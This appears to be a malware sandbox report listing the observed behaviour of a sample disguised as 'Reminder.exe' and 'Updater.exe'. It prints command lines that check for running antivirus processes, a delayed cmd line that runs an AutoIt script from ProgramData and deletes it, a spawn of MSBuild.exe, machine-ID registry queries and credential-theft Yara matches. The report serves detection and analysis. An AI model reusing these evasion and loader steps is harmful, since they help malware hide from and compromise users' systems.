Source: C:\Users\user\AppData\Local\coigned\Updater.exe Memory protected: page readonly | page read and write | page write copy | page execute | page execute and read and write | page guard
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\coigned\Updater.exe updater.exe C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000029.00000002.2093368871.0000000003E62000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.2510265571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY